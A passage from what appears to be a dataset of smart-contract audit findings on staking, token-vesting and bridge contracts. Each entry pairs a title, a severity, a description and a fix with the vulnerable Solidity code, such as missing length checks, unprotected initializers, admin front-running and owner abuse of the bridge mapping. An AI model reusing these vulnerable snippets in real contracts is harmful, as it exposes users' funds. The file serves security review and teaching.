onlyActiveOperator(\\_operatorIndex) {\\n if (\\_keyCount == 0) {\\n revert InvalidArgument();\\n }\\n\\n if (\\_publicKeys.length % PUBLIC\\_KEY\\_LENGTH != 0 || \\_publicKeys.length / PUBLIC\\_KEY\\_LENGTH != \\_keyCount) {\\n revert InvalidPublicKeys();\\n }\\n```\\n\\n`setWithdrawer` accepting any length for a `pubKey`. Note that `_getPubKeyRoot` will take any input provided and concat it the zero bytes.\\n```\\n/// @notice Set withdrawer for public key\\n/// @dev Only callable by current public key withdrawer\\n/// @param \\_publicKey Public key to change withdrawer\\n/// @param \\_newWithdrawer New withdrawer address\\nfunction setWithdrawer(bytes calldata \\_publicKey, address \\_newWithdrawer) external {\\n if (!StakingContractStorageLib.getWithdrawerCustomizationEnabled()) {\\n revert Forbidden();\\n }\\n \\_checkAddress(\\_newWithdrawer);\\n bytes32 pubkeyRoot = \\_getPubKeyRoot(\\_publicKey);\\n StakingContractStorageLib.WithdrawersSlot storage withdrawers = StakingContractStorageLib.getWithdrawers();\\n\\n if (withdrawers.value[pubkeyRoot] != msg.sender) {\\n revert Unauthorized();\\n }\\n\\n emit ChangedWithdrawer(\\_publicKey, \\_newWithdrawer);\\n\\n withdrawers.value[pubkeyRoot] = \\_newWithdrawer;\\n}\\n```\\n\\n```\\nfunction \\_getPubKeyRoot(bytes memory \\_publicKey) internal pure returns (bytes32) {\\n return sha256(abi.encodePacked(\\_publicKey, bytes16(0)));\\n}\\n```\\n\\nsimilarly, the withdraw family of functions does not enforce a pubkey length either. However, it is unlikely that someone finds a pubkey that matches a root for the attackers address.\\n```\\n/// @notice Withdraw the Execution Layer Fee for a given validator public key\\n/// @dev Funds are sent to the withdrawer account\\n/// @param \\_publicKey Validator to withdraw Execution Layer Fees from\\nfunction withdrawELFee(bytes calldata \\_publicKey) external {\\n \\_onlyWithdrawerOrAdmin(\\_publicKey);\\n \\_deployAndWithdraw(\\_publicKey, EXECUTION\\_LAYER\\_SALT\\_PREFIX, StakingContractStorageLib.getELDispatcher());\\n}\\n```\\n\\nNevertheless, the methods should be hardened so as not to give a malicious actor the freedom to use an unexpected input size for the `pubKey` argument.чEnforce pubkey length checks when accepting a single pubkey as bytes similar to the batch functions that check for a multiple of ´PUBLIC_KEY_LENGTH´. Alternatively, declare the function argument as `bytes48` (however, in this case inputs may be auto-padded to fit the expected length, pot. covering situations that otherwise would throw an error)чч```\\nfunction addValidators(\\n uint256 \\_operatorIndex,\\n uint256 \\_keyCount,\\n bytes calldata \\_publicKeys,\\n bytes calldata \\_signatures\\n) external onlyActiveOperator(\\_operatorIndex) {\\n if (\\_keyCount == 0) {\\n revert InvalidArgument();\\n }\\n\\n if (\\_publicKeys.length % PUBLIC\\_KEY\\_LENGTH != 0 || \\_publicKeys.length / PUBLIC\\_KEY\\_LENGTH != \\_keyCount) {\\n revert InvalidPublicKeys();\\n }\\n```\\n -Unpredictable Behavior Due to Admin Front Running or General Bad TimingчmediumчIn a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to the unfortunate timing of changes.\\nSome instances of this are more important than others, but in general, users of the system should have assurances about the behavior of the action they're about to take.\\nUpgradeable TU proxy\\nFee changes take effect immediately\\n```\\n/// @notice Change the Operator fee\\n/// @param \\_operatorFee Fee in Basis Point\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n\\n```\\n/// @notice Change the Global fee\\n/// @param \\_globalFee Fee in Basis Point\\nfunction setGlobalFee(uint256 \\_globalFee) external onlyAdmin {\\n if (\\_globalFee > StakingContractStorageLib.getGlobalCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalFee(\\_globalFee);\\n emit ChangedGlobalFee(\\_globalFee);\\n}\\n```\\nчThe underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.чч```\\n/// @notice Change the Operator fee\\n/// @param \\_operatorFee Fee in Basis Point\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n -Potentially Uninitialized ImplementationsчmediumчMost contracts in the system are meant to be used with a proxy pattern. First, the implementations are deployed, and then proxies are deployed that delegatecall into the respective implementations following an initialization call (hardhat, with same transaction). However, the implementations are initialized explicitly nor are they protected from other actors claiming/initializing them. This allows anyone to call initialization functions on implementations for use with phishing attacks (i.e. contract implementation addresses are typically listed on the official project website as valid contracts) which may affect the reputation of the system.\\nNone of the implementations allow unprotected delegatecalls or selfdesturcts. lowering the severity of this finding.\\n```\\nfunction initialize\\_1(\\n address \\_admin,\\n address \\_treasury,\\n address \\_depositContract,\\n address \\_elDispatcher,\\n address \\_clDispatcher,\\n address \\_feeRecipientImplementation,\\n uint256 \\_globalFee,\\n uint256 \\_operatorFee,\\n uint256 globalCommissionLimitBPS,\\n uint256 operatorCommissionLimitBPS\\n) external init(1) {\\n```\\n\\n```\\n/// @notice Initializes the receiver\\n/// @param \\_dispatcher Address that will handle the fee dispatching\\n/// @param \\_publicKeyRoot Public Key root assigned to this receiver\\nfunction init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external {\\n if (initialized) {\\n revert AlreadyInitialized();\\n }\\n initialized = true;\\n dispatcher = IFeeDispatcher(\\_dispatcher);\\n publicKeyRoot = \\_publicKeyRoot;\\n stakingContract = msg.sender; // The staking contract always calls init\\n}\\n```\\n\\n```\\n/// @param \\_publicKeyRoot Public Key root assigned to this receiver\\nfunction init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external {\\n if (initialized) {\\n revert AlreadyInitialized();\\n }\\n initialized = true;\\n dispatcher = IFeeDispatcher(\\_dispatcher);\\n publicKeyRoot = \\_publicKeyRoot;\\n}\\n```\\nчPetrify contracts in the constructor and disallow other actors from claiming/initializing the implementations.чч```\\nfunction initialize\\_1(\\n address \\_admin,\\n address \\_treasury,\\n address \\_depositContract,\\n address \\_elDispatcher,\\n address \\_clDispatcher,\\n address \\_feeRecipientImplementation,\\n uint256 \\_globalFee,\\n uint256 \\_operatorFee,\\n uint256 globalCommissionLimitBPS,\\n uint256 operatorCommissionLimitBPS\\n) external init(1) {\\n```\\n -Operator May DoS the Withdrawal or Make It More ExpensiveчmediumчWhile collecting fees, the operator may:\\ncause DoS for the funds/rewards withdrawal by reverting the call, thus reverting the whole transaction. By doing this, it won't be receiving any rewards, but so the treasury and withdrawer.\\nmake the withdrawal more expensive by sending a huge chunk of `returndata`. As the `returndata` is copied into memory in the caller's context, it will add an extra gas overhead for the withdrawer making it more expensive.\\nor mint gas token\\n```\\nif (operatorFee > 0) {\\n (status, data) = operator.call{value: operatorFee}(\"\");\\n if (status == false) {\\n revert FeeRecipientReceiveError(data);\\n }\\n}\\n```\\nчA possible solution could be to make a low-level call in an inline assembly block, restricting the `returndata` to a couple of bytes, and instead of reverting on the failed call, emit an event, flagging the call that failed.чч```\\nif (operatorFee > 0) {\\n (status, data) = operator.call{value: operatorFee}(\"\");\\n if (status == false) {\\n revert FeeRecipientReceiveError(data);\\n }\\n}\\n```\\n -ConsensusLayerFeeDispatcher/ExecutionLayerFeeDispatcher - Should Hardcode autoPetrify With Highest Initializable Version Instead of User Provided ArgumentчlowчThe version to auto-initialize is not hardcoded with the constructor. On deployment, the deployer may accidentally use the wrong version, allowing anyone to call `initialize` on the contract.\\n```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n```\\n\\n```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n\\n/// @notice Initialize the contract by storing the staking contract and the public key in storage\\n/// @param \\_stakingContract Address of the Staking Contract\\nfunction initELD(address \\_stakingContract) external init(1) {\\n STAKING\\_CONTRACT\\_ADDRESS\\_SLOT.setAddress(\\_stakingContract);\\n}\\n```\\nчSimilar to the `init(1)` modifier, it is suggested to track the highest version as a `const int` with the contract and auto-initialize to the highest version in the constructor instead of taking the highest version as a deployment argument.чч```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n```\\n -StakingContract - Misleading CommentчlowчThe comment notes that the expected caller is `admin` while the modifier checks that `msg.sender` is an active operator.\\n```\\n/// @notice Ensures that the caller is the admin\\nmodifier onlyActiveOperator(uint256 \\_operatorIndex) {\\n \\_onlyActiveOperator(\\_operatorIndex);\\n \\_;\\n}\\n```\\nчRectify the comment to accurately describe the intention of the method/modifier.чч```\\n/// @notice Ensures that the caller is the admin\\nmodifier onlyActiveOperator(uint256 \\_operatorIndex) {\\n \\_onlyActiveOperator(\\_operatorIndex);\\n \\_;\\n}\\n```\\n -Impractical Checks for Global/Operator Fees and the Commission LimitsчlowчThe contract initialization sets up the global and operator fees and also their commission limits. However, the checks just make sure that the fees or commission limit is up to 100% which is not a very practical check. Any unusual value, for instance, if set to 100% will mean the whole rewards/funds will be non-exempted and taxed as global fees, which we believe will never be a case practically.\\n```\\nif (\\_globalFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setGlobalFee(\\_globalFee);\\nif (\\_operatorFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n```\\n\\n```\\nfunction initialize\\_2(uint256 globalCommissionLimitBPS, uint256 operatorCommissionLimitBPS) public init(2) {\\n if (globalCommissionLimitBPS > BASIS\\_POINTS) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalCommissionLimit(globalCommissionLimitBPS);\\n if (operatorCommissionLimitBPS > BASIS\\_POINTS) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorCommissionLimit(operatorCommissionLimitBPS);\\n}\\n```\\n\\n```\\nfunction setGlobalFee(uint256 \\_globalFee) external onlyAdmin {\\n if (\\_globalFee > StakingContractStorageLib.getGlobalCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalFee(\\_globalFee);\\n emit ChangedGlobalFee(\\_globalFee);\\n}\\n```\\n\\n```\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\nчThe fees should be checked with a more practical limit. For instance, checking against a min - max limit, like 20% - 40%.чч```\\nif (\\_globalFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setGlobalFee(\\_globalFee);\\nif (\\_operatorFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n```\\n -Contracts Should Inherit From Their InterfacesчlowчThe following contracts should enforce correct interface implementation by inheriting from the interface declarations.\\n```\\n/// @title Ethereum Staking Contract\\n/// @author Kiln\\n/// @notice You can use this contract to store validator keys and have users fund them and trigger deposits.\\ncontract StakingContract {\\n using StakingContractStorageLib for bytes32;\\n```\\n\\n```\\ninterface IStakingContractFeeDetails {\\n function getWithdrawerFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external view returns (address);\\n\\n function getTreasury() external view returns (address);\\n\\n function getOperatorFeeRecipient(bytes32 pubKeyRoot) external view returns (address);\\n\\n function getGlobalFee() external view returns (uint256);\\n\\n function getOperatorFee() external view returns (uint256);\\n\\n function getExitRequestedFromRoot(bytes32 \\_publicKeyRoot) external view returns (bool);\\n\\n function getWithdrawnFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external view returns (bool);\\n\\n function toggleWithdrawnFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external;\\n}\\n```\\n\\n```\\ninterface IFeeRecipient {\\n function init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external;\\n\\n function withdraw() external;\\n}\\n```\\nчInherit from interface.чч```\\n/// @title Ethereum Staking Contract\\n/// @author Kiln\\n/// @notice You can use this contract to store validator keys and have users fund them and trigger deposits.\\ncontract StakingContract {\\n using StakingContractStorageLib for bytes32;\\n```\\n -Misleading Error StatementsчlowчThe contracts define custom errors to revert transactions on failed operations or invalid input, however, they convey little to no information, making it difficult for the off-chain monitoring tools to track relevant updates.\\n```\\nerror Forbidden();\\nerror InvalidFee();\\nerror Deactivated();\\nerror NoOperators();\\nerror InvalidCall();\\nerror Unauthorized();\\nerror DepositFailure();\\nerror DepositsStopped();\\nerror InvalidArgument();\\nerror UnsortedIndexes();\\nerror InvalidPublicKeys();\\nerror InvalidSignatures();\\nerror InvalidWithdrawer();\\nerror InvalidZeroAddress();\\nerror AlreadyInitialized();\\nerror InvalidDepositValue();\\nerror NotEnoughValidators();\\nerror InvalidValidatorCount();\\nerror DuplicateValidatorKey(bytes);\\nerror FundedValidatorDeletionAttempt();\\nerror OperatorLimitTooHigh(uint256 limit, uint256 keyCount);\\nerror MaximumOperatorCountAlreadyReached();\\nerror LastEditAfterSnapshot();\\nerror PublicKeyNotInContract();\\n```\\n\\nFor instance, the `init` modifier is used to initialize the contracts with the current Version. The Version initialization ensures that the provided version must be an increment of the previous version, if not, it reverts with an error as `AlreadyInitialized()`. However, the error doesn't convey an appropriate message correctly, as any version other than the expected version will signify that the version has already been initialized.\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != VERSION\\_SLOT.getUint256() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != VERSION\\_SLOT.getUint256() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != StakingContractStorageLib.getVersion() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\nчUse a more meaningful statement with enough information to track off-chain for all the custom errors in every contract in scope. For instance, add the current and supplied versions as indexed parameters, like: IncorrectVersionInitialization(current version, supplied version);\\nAlso, the function can be simplified as\\n```\\n function initELD(address \\_stakingContract) external init(VERSION\\_SLOT.getUint256() + 1) {\\n STAKING\\_CONTRACT\\_ADDRESS\\_SLOT.setAddress(\\_stakingContract);\\n }\\n```\\nчч```\\nerror Forbidden();\\nerror InvalidFee();\\nerror Deactivated();\\nerror NoOperators();\\nerror InvalidCall();\\nerror Unauthorized();\\nerror DepositFailure();\\nerror DepositsStopped();\\nerror InvalidArgument();\\nerror UnsortedIndexes();\\nerror InvalidPublicKeys();\\nerror InvalidSignatures();\\nerror InvalidWithdrawer();\\nerror InvalidZeroAddress();\\nerror AlreadyInitialized();\\nerror InvalidDepositValue();\\nerror NotEnoughValidators();\\nerror InvalidValidatorCount();\\nerror DuplicateValidatorKey(bytes);\\nerror FundedValidatorDeletionAttempt();\\nerror OperatorLimitTooHigh(uint256 limit, uint256 keyCount);\\nerror MaximumOperatorCountAlreadyReached();\\nerror LastEditAfterSnapshot();\\nerror PublicKeyNotInContract();\\n```\\n -Architectural Pattern of Internal and External Functions Increases Attack SurfaceчlowчThere is an architectural pattern throughout the code of functions being defined in two places: an external wrapper (name) that verifies authorization and validates parameters, and an internal function (_name) that contains the implementation logic. This pattern separates concerns and avoids redundancy in the case that more than one external function reuses the same internal logic.\\nFor example, `VotingTokenLockupPlans.setupVoting` calls an internal function `_setupVoting` and sets the `holder` parameter to `msg.sender`.\\n```\\nfunction setupVoting(uint256 planId) external nonReentrant returns (address votingVault) {\\n votingVault = \\_setupVoting(msg.sender, planId);\\n```\\n\\n```\\nfunction \\_setupVoting(address holder, uint256 planId) internal returns (address) {\\n require(ownerOf(planId) == holder, '!owner');\\n```\\n\\nIn this case, however, there is no case in which `holder` should not be set to `msg.sender`. Because the internal function doesn't enforce this, it's theoretically possible that if another internal (or derived) function were compromised then it could call `_setupVoting` with `holder` set to `ownerOf(planId)`, even if `msg.sender` isn't the owner. This increases the attack surface through providing unneeded flexibility.\\nOther Examples\\n```\\nfunction segmentPlan(\\n uint256 planId,\\n uint256[] memory segmentAmounts\\n) external nonReentrant returns (uint256[] memory newPlanIds) {\\n newPlanIds = new uint256[](segmentAmounts.length);\\n for (uint256 i; i < segmentAmounts.length; i++) {\\n uint256 newPlanId = \\_segmentPlan(msg.sender, planId, segmentAmounts[i]);\\n```\\n\\n```\\nfunction \\_segmentPlan(address holder, uint256 planId, uint256 segmentAmount) internal returns (uint256 newPlanId) {\\n require(ownerOf(planId) == holder, '!owner');\\n```\\n\\n```\\nfunction revokePlans(uint256[] memory planIds) external nonReentrant {\\n for (uint256 i; i < planIds.length; i++) {\\n \\_revokePlan(msg.sender, planIds[i]);\\n```\\n\\n```\\nfunction \\_revokePlan(address vestingAdmin, uint256 planId) internal {\\n Plan memory plan = plans[planId];\\n require(vestingAdmin == plan.vestingAdmin, '!vestingAdmin');\\n```\\nчResolution\\nFixed as of commit `f4299cdba5e863c9ca2d69a3a7dd554ac34af292`.\\nTo reduce the attack surface, consider hard coding parameters such as `holder` to `msg.sender` in internal functions when extra flexibility isn't needed.чч```\\nfunction setupVoting(uint256 planId) external nonReentrant returns (address votingVault) {\\n votingVault = \\_setupVoting(msg.sender, planId);\\n```\\n -Revoking Vesting Will Trigger a Taxable EventчlowчResolution\\nFixed as of commit `f4299cdba5e863c9ca2d69a3a7dd554ac34af292`.\\nFrom the previous conversations with the Hedgey team, we identified that users should be in control of when taxable events happen. For that reason, one could redeem a plan in the past. Unfortunately, the recipient of the vesting plan can not always be in control of the redemption process. If for one reason or another the administrator of the vesting plan decides to revoke it, any vested funds will be sent to the vesting plan holder, triggering the taxable event and burning the NFT.\\n```\\nfunction \\_revokePlan(address vestingAdmin, uint256 planId) internal {\\n Plan memory plan = plans[planId];\\n require(vestingAdmin == plan.vestingAdmin, '!vestingAdmin');\\n (uint256 balance, uint256 remainder, ) = planBalanceOf(planId, block.timestamp, block.timestamp);\\n require(remainder > 0, '!Remainder');\\n address holder = ownerOf(planId);\\n delete plans[planId];\\n \\_burn(planId);\\n TransferHelper.withdrawTokens(plan.token, vestingAdmin, remainder);\\n TransferHelper.withdrawTokens(plan.token, holder, balance);\\n emit PlanRevoked(planId, balance, remainder);\\n}\\n```\\n\\n```\\nfunction \\_revokePlan(address vestingAdmin, uint256 planId) internal {\\n Plan memory plan = plans[planId];\\n require(vestingAdmin == plan.vestingAdmin, '!vestingAdmin');\\n (uint256 balance, uint256 remainder, ) = planBalanceOf(planId, block.timestamp, block.timestamp);\\n require(remainder > 0, '!Remainder');\\n address holder = ownerOf(planId);\\n delete plans[planId];\\n \\_burn(planId);\\n address vault = votingVaults[planId];\\n if (vault == address(0)) {\\n TransferHelper.withdrawTokens(plan.token, vestingAdmin, remainder);\\n TransferHelper.withdrawTokens(plan.token, holder, balance);\\n } else {\\n delete votingVaults[planId];\\n VotingVault(vault).withdrawTokens(vestingAdmin, remainder);\\n VotingVault(vault).withdrawTokens(holder, balance);\\n }\\n emit PlanRevoked(planId, balance, remainder);\\n}\\n```\\nчOne potential workaround is to only withdraw the unvested portion to the vesting admin while keeping the vested part in the contract. That being said `amount` and `rate` variables would need to be updated in order not to allow any additional vesting for the given plan. This way plan holders will not be entitled to more funds but will be able to redeem them at the time they choose.чч```\\nfunction \\_revokePlan(address vestingAdmin, uint256 planId) internal {\\n Plan memory plan = plans[planId];\\n require(vestingAdmin == plan.vestingAdmin, '!vestingAdmin');\\n (uint256 balance, uint256 remainder, ) = planBalanceOf(planId, block.timestamp, block.timestamp);\\n require(remainder > 0, '!Remainder');\\n address holder = ownerOf(planId);\\n delete plans[planId];\\n \\_burn(planId);\\n TransferHelper.withdrawTokens(plan.token, vestingAdmin, remainder);\\n TransferHelper.withdrawTokens(plan.token, holder, balance);\\n emit PlanRevoked(planId, balance, remainder);\\n}\\n```\\n -Use of selfdestruct Deprecated in VotingVaultчlowчThe `VotingVault.withdrawTokens` function invokes the `selfdestruct` operation when the vault is empty so that it can't be used again.\\nThe use ofselfdestruct has been deprecated and a breaking change in its future behavior is expected.\\n```\\nfunction withdrawTokens(address to, uint256 amount) external onlyController {\\n TransferHelper.withdrawTokens(token, to, amount);\\n if (IERC20(token).balanceOf(address(this)) == 0) selfdestruct;\\n}\\n```\\nчRemove the line that invokes `selfdestruct` and consider changing internal state so that future calls to `delegateTokens` always revert.чч```\\nfunction withdrawTokens(address to, uint256 amount) external onlyController {\\n TransferHelper.withdrawTokens(token, to, amount);\\n if (IERC20(token).balanceOf(address(this)) == 0) selfdestruct;\\n}\\n```\\n -Balance of msg.sender Is Used Instead of the from AddressчlowчThe `TransferHelper` library has methods that allow transferring tokens directly or on behalf of a different wallet that previously approved the transfer. Those functions also check the sender balance before conducting the transfer. In the second case, where the transfer happens on behalf of someone the code is checking not the actual token spender balance, but the `msg.sender` balance instead.\\n```\\nfunction transferTokens(\\n address token,\\n address from,\\n address to,\\n uint256 amount\\n) internal {\\n uint256 priorBalance = IERC20(token).balanceOf(address(to));\\n require(IERC20(token).balanceOf(msg.sender) >= amount, 'THL01');\\n```\\nчUse the `from` parameter instead of `msg.sender`.чч```\\nfunction transferTokens(\\n address token,\\n address from,\\n address to,\\n uint256 amount\\n) internal {\\n uint256 priorBalance = IERC20(token).balanceOf(address(to));\\n require(IERC20(token).balanceOf(msg.sender) >= amount, 'THL01');\\n```\\n -Bridge Token Would Be Locked and Cannot Bridge to Native TokenчhighчIf the bridge token B of a native token A is already deployed and `confirmDeployment` is called on the other layer and `setDeployed` sets A's `nativeToBridgedToken` value to `DEPLOYED_STATUS`. The bridge token B cannot bridge to native token A in `completeBridging` function, because A's `nativeToBridgedToken` value is not `NATIVE_STATUS`, as a result the native token won't be transferred to the receiver. User's bridge token will be locked in the original layer\\n```\\nif (nativeMappingValue == NATIVE\\_STATUS) {\\n // Token is native on the local chain\\n IERC20(\\_nativeToken).safeTransfer(\\_recipient, \\_amount);\\n} else {\\n bridgedToken = nativeMappingValue;\\n if (nativeMappingValue == EMPTY) {\\n // New token\\n bridgedToken = deployBridgedToken(\\_nativeToken, \\_tokenMetadata);\\n bridgedToNativeToken[bridgedToken] = \\_nativeToken;\\n nativeToBridgedToken[\\_nativeToken] = bridgedToken;\\n }\\n BridgedToken(bridgedToken).mint(\\_recipient, \\_amount);\\n}\\n```\\n\\n```\\nfunction setDeployed(address[] memory \\_nativeTokens) external onlyMessagingService fromRemoteTokenBridge {\\n address nativeToken;\\n for (uint256 i; i < \\_nativeTokens.length; i++) {\\n nativeToken = \\_nativeTokens[i];\\n nativeToBridgedToken[\\_nativeTokens[i]] = DEPLOYED\\_STATUS;\\n emit TokenDeployed(\\_nativeTokens[i]);\\n }\\n}\\n```\\nчAdd an condition `nativeMappingValue` = `DEPLOYED_STATUS` for native token transfer in `confirmDeployment`\\n```\\nif (nativeMappingValue == NATIVE_STATUS || nativeMappingValue == DEPLOYED_STATUS) {\\n IERC20(_nativeToken).safeTransfer(_recipient, _amount);\\n```\\nчч```\\nif (nativeMappingValue == NATIVE\\_STATUS) {\\n // Token is native on the local chain\\n IERC20(\\_nativeToken).safeTransfer(\\_recipient, \\_amount);\\n} else {\\n bridgedToken = nativeMappingValue;\\n if (nativeMappingValue == EMPTY) {\\n // New token\\n bridgedToken = deployBridgedToken(\\_nativeToken, \\_tokenMetadata);\\n bridgedToNativeToken[bridgedToken] = \\_nativeToken;\\n nativeToBridgedToken[\\_nativeToken] = bridgedToken;\\n }\\n BridgedToken(bridgedToken).mint(\\_recipient, \\_amount);\\n}\\n```\\n -User Cannot Withdraw Funds if Bridging Failed or Delayed Won't FixчhighчIf the bridging failed due to the single coordinator is down, censoring the message, or bridge token contract is set to a bad or wrong contract address by `setCustomContract`, user's funds will stuck in the `TokenBridge` contract until coordinator is online or stop censoring, there is no way to withdraw the deposited funds\\n```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\nчAdd withdraw functionality to let user withdraw the funds under above circumstances or at least add withdraw functionality for Admin (admin can send the funds to the user manually), ultimately decentralize coordinator and sequencer to reduce bridging failure risk.чч```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n -Bridges Don't Support Multiple Native Tokens, Which May Lead to Incorrect BridgingчhighчCurrently, the system design does not support the scenarios where native tokens with the same addresses (which is possible with the same deployer and nonce) on different layers can be bridged.\\nFor instance, Let's consider, there is a native token `A` on `L1` which has already been bridged on `L2`. If anyone tries to bridge native token `B` on `L2` with the same address as token `A` , instead of creating a new bridge on `L1` and minting new tokens, the token bridge will transfer native token `A` on `L1` to the `_recipient` which is incorrect.\\nThe reason is the mappings don't differentiate between the native tokens on two different Layers.\\n```\\n mapping(address => address) public nativeToBridgedToken;\\n mapping(address => address) public bridgedToNativeToken;\\n```\\n\\n```\\nfunction completeBridging(\\n address \\_nativeToken,\\n uint256 \\_amount,\\n address \\_recipient,\\n bytes calldata \\_tokenMetadata\\n) external onlyMessagingService fromRemoteTokenBridge {\\n address nativeMappingValue = nativeToBridgedToken[\\_nativeToken];\\n address bridgedToken;\\n\\n if (nativeMappingValue == NATIVE\\_STATUS) {\\n // Token is native on the local chain\\n IERC20(\\_nativeToken).safeTransfer(\\_recipient, \\_amount);\\n } else {\\n```\\nчRedesign the approach to handle the same native tokens on different layers. One possible approach could be to define the set of mappings for each layer.чч```\\n mapping(address => address) public nativeToBridgedToken;\\n mapping(address => address) public bridgedToNativeToken;\\n```\\n -No Check for Initializing Parameters of TokenBridgeчhighчIn `TokenBridge` contract's `initialize` function, there is no check for initializing parameters including `_securityCouncil`, `_messageService`, `_tokenBeacon` and `_reservedTokens`. If any of these address is set to 0 or other invalid value, `TokenBridge` would not work, user may lose funds.\\n```\\nfunction initialize(\\n address \\_securityCouncil,\\n address \\_messageService,\\n address \\_tokenBeacon,\\n address[] calldata \\_reservedTokens\\n) external initializer {\\n \\_\\_Pausable\\_init();\\n \\_\\_Ownable\\_init();\\n setMessageService(\\_messageService);\\n tokenBeacon = \\_tokenBeacon;\\n for (uint256 i = 0; i < \\_reservedTokens.length; i++) {\\n setReserved(\\_reservedTokens[i]);\\n }\\n \\_transferOwnership(\\_securityCouncil);\\n}\\n```\\nчAdd non-zero address check for `_securityCouncil`, `_messageService`, `_tokenBeacon` and `_reservedTokens`чч```\\nfunction initialize(\\n address \\_securityCouncil,\\n address \\_messageService,\\n address \\_tokenBeacon,\\n address[] calldata \\_reservedTokens\\n) external initializer {\\n \\_\\_Pausable\\_init();\\n \\_\\_Ownable\\_init();\\n setMessageService(\\_messageService);\\n tokenBeacon = \\_tokenBeacon;\\n for (uint256 i = 0; i < \\_reservedTokens.length; i++) {\\n setReserved(\\_reservedTokens[i]);\\n }\\n \\_transferOwnership(\\_securityCouncil);\\n}\\n```\\n -Owner Can Update Arbitrary Status for New Native Token Without ConfirmationчhighчThe function `setCustomContract` allows the owner to update arbitrary status for new native tokens without confirmation, bypassing the bridge protocol.\\nIt can set `DEPLOYED_STATUS` for a new native token, even if there exists no bridged token for it.\\nIt can set `NATIVE_STATUS` for a new native token even if it's not.\\nIt can set `RESERVED_STATUS` disallowing any new native token to be bridged.\\n```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\nчThe function should not allow `_targetContract` to be any state codeчч```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n -Owner May Exploit Bridged TokensчhighчThe function `setCustomContract` allows the owner, to define a custom ERC20 contract for the native token. However, it doesn't check whether the target contract has already been defined as a bridge to a native token or not. As a result, the owner may take advantage of the design flaw and bridge another new native token that has not been bridged yet, to an already existing target(already a bridge for another native token). Now, if a user tries to bridge this native token, the token bridge on the source chain will take the user's tokens, and instead of deploying a new bridge on the destination chain, tokens will be minted to the `_recipient` on an existing bridge defined by the owner, or it can be any random EOA address to create a DoS.\\nThe owner can also try to front-run calls to `completeBridging` for new Native Tokens on the destination chain, by 